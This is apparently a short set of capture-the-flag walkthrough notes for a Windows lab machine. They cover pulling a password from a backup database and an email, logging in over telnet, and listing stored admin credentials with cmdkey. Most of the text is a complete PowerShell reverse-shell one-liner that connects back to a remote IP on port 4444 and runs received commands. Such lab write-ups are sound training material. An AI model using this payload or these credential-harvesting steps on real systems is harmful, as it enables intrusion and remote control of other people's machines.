1. get engineer pass in backup.mdb

2. get mail 
-----------------------
Hi there,



The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.
+Please ensure this is passed on to your engineers.



Regards,

John
-----------------------

3. telnet by security 4Cc3ssC0ntr0ller
4. get user

======
root
======
1. cmdkey /list  find have stored the admin credi

2.$client = New-Object System.Net.Sockets.TCPClient("10.10.13.251",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|^%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2^>^&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "^> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

